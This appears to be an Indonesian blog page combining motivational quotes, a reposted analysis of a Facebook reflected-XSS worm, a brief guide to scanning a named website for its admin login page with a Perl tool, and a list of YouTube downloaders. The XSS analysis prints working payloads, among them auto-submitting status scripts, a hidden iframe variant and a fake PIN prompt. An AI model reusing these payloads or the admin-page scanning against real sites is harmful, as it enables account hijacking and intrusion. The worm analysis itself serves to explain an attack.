Kumpulan Kata2 Mutiara Terbaru

Saat bertemu teman yang dapat dipercaya, rukunlah bersamanya.
Karena seumur hidup manusia, teman sejati (sahabat) tak mudah ditemukan.

Saat bertemu penolongmu,
Ingat untuk berterima kasih padanya.
Karena ialah yang membantu mengubah hidupmu

Saat bertemu orang yang pernah kau cintai,
Tersenyumlah dengan wajar .
Karena ia lah orang yang membuatmu lebih mengerti tentang cinta

Saat bertemu orang yang pernah kau benci,
Sapalah dengan tersenyum.
Karena ia membuatmu semakin teguh / kuat.

Saat bertemu orang yang pernah mengkhianatimu, Baik-baiklah berbincanglah dengannya.
Karena jika bukan karena dia, hari ini engkau tak memahami dunia ini.

Saat bertemu orang yang tergesa-gesa meninggalkanmu,
Berterima-kasihlah bahwa ia pernah ada dalam hidupmu.
Karena ia adalah bagian dari nostalgiamu

Saat bertemu orang yang pernah salah-paham padamu,
Gunakan saat tersebut untuk menjelaskannaya.
Karena engkau mungkin hanya punya satu kesempatan itu saja untuk menjelaskan

Dan Saat engkau bertemu seseorang yang saat ini menemanimu seumur hidup (suami / istri) kita,
Berterima-kasihlah sepenuhnya bahwa ia mencintaimu.
Karena saat ini kalian mendapatkan kebahagiaan dan cinta sejati yang kau cari

Ketika satu pintu kebahagiaan tertutup, pintu yang lain dibukakan.
Tetapi sering kali kita terpaku terlalu lama pada pintu yang tertutup sehingga tidak melihat pintu lain yang dibukakan bagi kita.

Dalam hidup,terkadang kita lebih banyak mendapatkan apa yang tidak kita inginkan. Dan ketika kita mendapatkan apa yang kita inginkan, akhirnya kita tahu bahwa yang kita inginkan terkadang tidak dapat membuat hidup kita menjadi lebih bahagia

Bermimpilah tentang apa yang ingin kamu impikan, pergilah ke tempat-tempat kamu ingin pergi.
Jadilah seperti yang kamu inginkan, kerna kamu hanya memiliki satu kehidupan dan satu kesempatan untuk melakukan hal-hal yang ingin kamu lakukan.

Masa depan yang cerah berdasarkan pada masa lalu yang telah dilupakan. Kamu tidak dapat melangkah dengan baik dalam kehidupan kamu sampai kamu melupakan kegagalan kamu dan rasa sakit hati.

Waktu kamu lahir, kamu menangis dan orang-orang di sekelilingmu tersenyum.
Jalanilah hidupmu sehingga pada waktu kamu meninggal, kamu tersenyum dan orang-orang di sekelilingmu menangis.

Semoga kamu mendapat cukup kebahagiaan untuk membuat kamu bahagia, cukup
cubaan untuk membuat kamu kuat, cukup penderitaan untuk membuat kamu menjadi
manusia yang sesungguhnya, dan cukup harapan untuk membuat kamu positif terhadap kehidupan.

Yang memimpin wanita bukan akalnya, melainkan hatinya.

Hari ini bila ia datang, jangan biarkan ia berlalu pergi. Esok kalau ia masih bertandang, jangan harap ia akan datang kembali

Sesuatu yang baik, belum tentu benar.
Sesuatu yang benar, belum tentu baik.
Sesuatu yang bagus, belum tentu berharga.
Sesuatu yang berharga/berguna, belum tentu bagus.

Agama menjadi sendi hidup, pengaruh menjadi penjaganya. Kalau tidak bersendi, runtuhlah hidup dan kalau tidak berpenjaga, binasalah hayat. Orang yang terhormat itu kehormatannya sendiri melarangnya berbuat jahat. -Pepatah Arab

Jangan tertarik kepada seseorang kerna parasnya, sebab keelokan paras dapat menyesatkan. Jangan pula tertarik kepada kekayaannya kerna kekayaan dapat musnah. Tertariklah kepada seseorang yang dapat membuatmu tersenyum, kerna hanya senyum yang dapat membuat hari-hari yang gelap menjadi cerah.

Sungguh benar bahwa kita tidak tahu apa yang kita miliki sampai kita kehilangannya,
tetapi sungguh benar pula bahwa kita tidak tahu apa yang belum pernah kita miliki sampai kita mendapatkannya.

Masa depan yang cerah selalu tergantung pada masa lalu yang dilupakan.
Kita tidak dapat meneruskan hidup dengan baik jika tidak dapat melupakan kegagalan dan sakit hati di masa lalu.

Tentang Waktu

Ambillah waktu untuk berfikir, itu adalah sumber kekuatan.
Ambillah waktu untuk bermain, itu adalah rahsia dari masa muda yang abadi.
Ambillah waktu untuk berdoa, itu adalah sumber ketenangan.
Ambillah waktu untuk belajar, itu adalah sumber kebijaksanaan.
Ambillah waktu untuk mencintai dan dicintai, itu adalah hak istimewa yang diberikan Tuhan.
Ambillah waktu untuk bersahabat, itu adalah jalan menuju kebahagiaan.
Ambillah waktu untuk tertawa, itu adalah musik yang menggetarkan hati.
Ambillah waktu untuk memberi, itu adalah membuat hidup terasa bererti.
Ambillah waktu untuk bekerja, itu adalah nilai keberhasilan.
Ambillah waktu untuk beramal, itu adalah kunci menuju syurga.

Harta yang paling menguntungkan ialah SABAR. Teman yang paling akrab adalah AMAL. Pengawal peribadi yang paling waspada DIAM. Bahasa yang paling manis SENYUM. Dan ibadah yang paling indah tentunya KHUSYUK.

Wanita yang cantik tanpa peribadi yang mulia ,umpama kaca mata yang bersinar-bersinar, tetapi tidak melihat apa-apa

Jangan sekali-kali kita meremehkan sesuatu perbuatan baik walaupun hanya sekadar senyuman.

Anda bukan apa yang anda fikirkan tentang anda, tetapi apa yang anda fikirkan itulah anda

Hidup tak selalunya indah tapi yang indah itu tetap hidup dalam kenangan.

Hidup memerlukan pengorbananan. Pengorbanan memerlukan perjuangan. Perjuangan memerlukan ketabahan.
Ketabahan memerlukan keyakinan. Keyakinan pula menentukan kejayaan. Kejayaan pula akan menentukan kebahagiaan.

Kekayaan bukanlah satu dosa dan kecantikan bukanlah satu kesalahan.
Oleh itu jika anda memiliki kedua-duanya janganlah anda lupa pada Yang Maha Berkuasa.

Sampan tidak akan dapat belayar di padang pasir betapa pun jua empuknya pasir itu -Pepatah Arab

Perjalanan seribu batu bermula dari satu langkah.
- Lao Tze

Kalaulah anda tidak mampu untuk menggembirakan orang lain, janganlah pula anda menambah dukanya.

Gantungkan azam dan semangatmu setinggi bintang di langit dan rendahkan hatimu serendah mutiara di lautan

Saya percaya, esok sudah tidak boleh mengubah apa yang berlaku hari ini, tetapi hari ini masih boleh mengubah apa yang akan terjadi pada hari esok.

Penyebaran Link Berantai di FACEBOOK

Hari ini saya menyadari ada yang tidak beres dengan status teman-teman facebook saya. Banyak yang mendadak statusnya berisi promosi suatu link bahkan hingga berkali-kali. Apa gerangan yang terjadi? Dalam artikel ini saya akan membedah teknik penyebaran status berantai tersebut.

Analisa

Mari kita mulai analisa kita dengan mengambil sample satu URL jebakan, yaitu tinyurl.com/sampahh. Ini adalah url versi pendek yang bila diklik akan melakukan redirect ke url aslinya, yaitu:

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang   http://tinyurl.com/sampahh';document.forms[0].submit();}</script>

URL tersebut akan saya pecah menjadi 3 bagian:

• http://m.facebook.com/connect/prompt_feed.php

• ?display=wap&user_message_prompt=

• '<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang   http://tinyurl.com/sampahh';document.forms[0].submit();}</script>

Bagian pertama adalah URL untuk update status. Bagian kedua adalah query string parameter yang terdiri dari dua parameter, yaitu display dan user_message_prompt. Bagian ketiga adalah isi dari parameter user_message_prompt yang merupakan payload javascript untuk mengubah status secara otomatis.

The Prompt

Sebelum masuk lebih jauh membahas payloadnya, mari kita lihat dulu bentuk tampilan dari URL untuk mengubah status ini. Gambar ini adalah screenshot ketika browser membuka URL:

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=Masukkan Status

Dari gambar di atas kini kita memahami fungsi dari parameter user_message_prompt, yaitu sebagai judul pertanyaan/prompt. Agar user mengerti apa yang harus diinputkan, dalam setiap prompt harus diberi judul yang jelas, contohnya: “Input your PIN”, “Enter your Name”, “Password:” dan sebagainya. Silakan anda mencoba bermain-main dengan mengubah-ubah nilai user_message_prompt sesuka anda di address bar dan perhatikan apa yang terjadi.

Reflected Cross Site Scripting

Normalnya user_message_prompt diisi dengan murni teks saja berupa instruksi/petunjuk apa yang harus diinputkan user. Bila parameter user_message_prompt berisi teks murni saja, maka tidak ada yang perlu dikhawatirkan, namun bagaimana bila parameter tersebut diisi dengan kode HTML atau javascript?

Perhatikan apa yang terjadi bila user_message_prompt diisi dengan kode HTML:

<font color=red><h1>Hello!!</h1></font>

Perhatikan juga apa yang terjadi bila user_message_prompt diisi dengan kode HTML:

<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNyqu5SgEQD_ijfUdmvnfM8iPpdp8IqVZU227jMcc3afMapO5065_T3k6g02IXFt6IiK5Vb-r9zkMIoLaklYXImAAf6LjUM0N_Y1UBbEWSaMCD95uApAQkL04rl9yq9_nYMOC-Bp9AvxE/s320/Hacked.jpg"/>

Bagaimana bila user_message_prompt tidak hanya diisi dengan kode HTML, tapi diisi dengan kode javascript? Mari kita coba memasukkan javascript sederhana berikut ini:

<script>prompt("Enter your PIN");</script>

Kita sudah melihat bagaimana user_message_prompt tidak hanya bisa diisi dengan normal teks, namun juga bisa diisi dengan kode HTML dan javascript yang dieksekusi browser. Ini adalah vulnerability yang disebut dengan XSS (Cross Site Scripting), lebih tepatnya reflected-XSS (karena kode yang diinjeksikan dalam URL “dipantulkan” kembali sebagai response HTTP).

The Payload

Dalam contoh sebelumnya kita mencoba memasukkan javascript sederhana yang hanya menampilkan prompt input kepada user. Sebenarnya javascript bisa dipakai untuk melakukan hampir apa saja mulai dari yang sekedar iseng seperti mengubah status, sampai yang serius seperti seperti mencuri cookie korban atau take-over komputer korban dengan mengeksploitasi kelemahan pada browsernya. Hal-hal inilah yang disebut dengan payload. Attacker bebas memasukkan payload apa saja yang dia inginkan seperti mengubah status, mencuri cookie dsb.

Perhatikan kembali isi parameter user_message_prompt yang didapat dari tinyurl.com/sampahh:

user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang   http://tinyurl.com/sampahh';document.forms[0].submit();}</script>

Bagi pembaca yang jeli tentu merasa aneh, kenapa ada karakter single-quote (‘) sebelum tag script? Perlukah karakter single-quote ini? Jawabannya adalah tidak perlu sama sekali. Saya melihat semua yang membuat url sejenis ini dalam payloadnya selalu ada karakter single-quote di depan tag script. Mungkin pembuatnya hanya ikut-ikutan saja tanpa benar-benar mengerti apa yang terjadi, karena dia mencontoh orang lain memakai single-quote, maka diapun ikut memakai single-quote.

Payload untuk mengubah status sebenarnya sangat sederhana. Berikut ini adalah payload untuk mengubah status di facebook secara otomatis:

Onload adalah event yang terjadi bila suatu halaman web selesai di-load. Baris pertama pada kode di atas artinya meminta browser untuk mengeksekusi sebuah fungsi secara otomatis ketika halaman ini selesai diload. Fungsi yang dimaksud terdiri dari dua baris kode sederhana untuk mengubah nilai textarea message dan melakukan submit form.

Baris kedua dimaksudkan untuk mengubah nilai dari textarea bernama message seperti gambar di bawah ini.

Langkah terakhir adalah memanggil fungsi submit() untuk melakukan submit form. Jadi sangat sederhana cara untuk mengubah status secara otomatis, cukup dua langkah saja, mengisi message dengan isi status, lalu submit, status pun selesai diubah.

Varian Lain dengan IFRAME

Saya juga menemukan varian lain yang memakai iframe. Varian ini lebih berbahaya karena bisa disisipkan dalam web apapun dan bisa dengan mudah melakukan pengubahan status berulang kali. Salah satu teman facebook saya menjadi korban freesmsvoip.com sampai berkali-kali.

Kenapa bisa kena sampai berkali-kali? Mari kita lihat potongan awal source html dari www.freesmsvoip.com.

<iframe id="CrazyDaVinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Kirim SMS Gratis Ke Semua Operator di www.freesmsvoip.com Wow.. cool guys! coba gihhh!!!';document.forms[0].submit();}</script>"></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>SMS Gratis Semua Operator - Kirim SMS Gratis Via Internet - SMS Gratis Online - Widget SMS Gratis</title>
<meta name="description" content="Kirim SMS gratis ke semua operator GSM, CDMA se-Indonesia tanpa bayar lewat internet" />

Perhatikan pada baris pertama ada tag iframe dengan src yang juga mengeksploitasi XSS vulnerability pada m.facebook.com/connect/prompt_feed.php. Tag iframe ini tidak hanya ada pada halaman depan saja, namun pada setiap halaman di web tersebut. Akibatnya bila pengunjung hanya melihat halaman depan saja, dia hanya kena satu kali, bila dia juga berkunjung ke halaman-halaman lain, maka dia akan melakukan update status berkali-kali.

Berbeda dengan kasus yang memakai jasa pemendek url seperti tinyurl.com, serangan memakai iframe bisa dilekatkan pada halaman web yang tampak normal, baik hati dan tidak sombong. Dengan maraknya kasus eksploitasi XSS dengan url-shortener, orang akan semakin curiga bila menerima link yang dipendekkan karena user tidak tahu url itu akan dibelokkan ke mana. Menerima url yang dipendekkan kini mirip dengan menerima paket yang tidak jelas apa isinya, buku atau bom. Namun berbeda kasusnya dengan url yang panjang, orang cenderung tidak curiga bila menerima url panjang, apalagi domainnya tampak seperti situs baik-baik.

Semoga Bermanfaat buat teman-teman semuanya... ;)

Source: http://www[.]ilmuhacking[.]com a.k.a Rizki Wicaksono

Mencari Halaman Admin Loggin

Download Tools Perl:
Download perl
Download Admin Finder:
Download Finder
Langkah-langkah:

1. Install Perl Di PC Anda
2. Copy Admin Finder & Jalankan (C:\)
3. Start > run > cmd > enter

Tampilan Command Prompt akan muncul:
Lanjutkan langkah seperti gambar dibawah:
Ketik perintah: cd\

Kemudian ketik: admin.pl & enter

Kemudian masukkan target, contoh: “www.webcoding.ucoz.com”

Pilihan bahasa, pilih saja “ANY” biar semua bisa di check

Proses pencarian berjalan seperti gambar dibawah:

DUARRR.. Web Admin Login udah ketemu & selamat melanjutkan prosesnya
Credit: M[i][n][d][F][r][e][a][k]

Download Video YouTube dengan Cepat dan Mudah

YouTube merupakan salah satu (bahkan bisa dikatakan yang terbesar) website yang meberikan kemudahan pengguna internet untuk meng-upload dan menonton video yang kita miliki. Tapi masalahnya, secara default video di youtube tidak bisa di-download kecuali pemilik dari video tersebut memberikan link download dari video.

Sangat menyulitkan pengguna internet jika ingin menonton video secara offline terlebih lagi jika ingin mentransfernya ke perangkat mobile sekaligus share dengan teman atau sahabat mengenai video tersebut. Anda dapat melakukan download video dari youtube dengan mengikuti penjelasan di bawah ini.

Pada dasarnya, download video youtube dibedakan dalam dua garis besar yaitu berbasis web dan berbasis aplikasi (software). Penjelasan singkatnya, kalau yang berbasis web anda akan menggunakan jasa web lain untuk download dengan cara memasukkan URL video pada website penyedia jasa tersebut. Yang kedua, anda harus menginstall sebuah aplikasi ke komputer dan dilanjutkan dengan cara yang sama seperti di atas, memasukkan URL address ke dalam software sebelum melakukan download video.

Menggunakan Website Penyedia Jasa Download Video :

1) Downloader9.com

Situs dengan tampilan sederhana yang memberikan layanan download dari beberapa internet video website. Anda dapat menggunakannya untuk beberapa webiste video seperti YouTube, DailyMotion, MySpace, MetaCafe dan beberapa video web yang menggunakan format FLV video. Dan jangan lupa juga sediakan software media player untuk menonton video yang telah anda download.

2) KeepVID.com

Sama seeprti sebelumnya, hanya perlu memasukkan URL dari video yang ingin anda download. Selain format FLV, anda juga dapat download file dengan format MP4, sebuah pilihan menarik untuk download video.

3) Vixy.net

Satu pilihan menarik dari Vixy website, anda dapat memilih ingin menconvert ke dalam bentuk apa file video yang akan anda download. Anda dapat mengconvertnya ke dalam bentuk file AVI, MOV, MP4, 3GP atau MP3 (hanya audionya saja).

4) Easy YouTube Video Downloader

Ini adalah add-on firefox yang bisa anda tambahkan ke dalam web browser. Cara kerjanya, install add-on tersebut ke dalam firefox, kemudian buka halaman YouTube yang ingin anda download dan lakukan download menggunakan add-on easy youtube video downloader.

5) SaveTube.com

Sama seperti yang lain, website ini akan menconvert file youtube ke dalam format WMV atau AVI yang tentunya akan memudahkan anda jika ingin memasukkanya ke dalam portable media player.

Menggunakan Aplikasi Desktop (Software) :

1) Orbit Downloader

Selain sebagai apliaksi untuk download video dari youtube, apliaksi ini juga dapat anda gunakan untuk download dari website streaming musik seperti Pandora, MySpace dan beberapa website yang lain.

2) YouTube FLV Downloader

Aplikasi ini akan mndownload file FLV yang asli dan tanpa convert ke format lain. Anda harus menyediakan FLV player untuk melihat video tersebut. Segi positifnya, anda akan memperoleh file FLV asli seperti pada website. Jika ingin fitur convert video ke format lain, anda bisa upgrade ke versi berbayar yang tentunya harus mengeluarkan sedikit dana guna membeli lisensinya.

3) Vixy

Selain menyediakan layanan berbasis web, vixy juga menyediakan aplikasi yang dapat digunakan untuk download video. Walapun masih dalam versi “beta”, apliaksi ini layak dicoba jika ingin menonton video youtube secara offline.

4) VDownloader

Tidak perlu dijelaskan karena sesuai namanya V = video dan Downloader = alat/aplikasi/software yang digunakan untuk men-download video. Kunjungi saja official websitenya dan install aplikasinya di komputer anda. Yang menarik, aplikasi ini dapat menconvert video ke dalam bentuk AVI, MPG, MP4 (iPod/iPhone), PSP, 3GP, Nokia, VCD, SVCD, FLV and MP3.

Semua aplikasi di atas, baik berbasis web atau aplikasi desktop dapat anda gunakan untuk download video youtube dan beberapa website video yang lain. Jika anda bertanya manakah yang terbaik? Kami tidak bisa memberikan rekomendasi karena setiap aplikasi punya kelebihan dan kekurangan masing-masing.

Selain daftar di atas, masih banyak aplikasi lain yang dapat anda gunakan. Jika anda punya apliaksi favorite yang tidak ada pada daftar di atas, beritahu kami apa itu dan apa kelebihannya menurut anda dengan meninggalkan komentar di bawah ini!

Semoga Bermanfaat buat teman2 semuanya, terima kasih!!!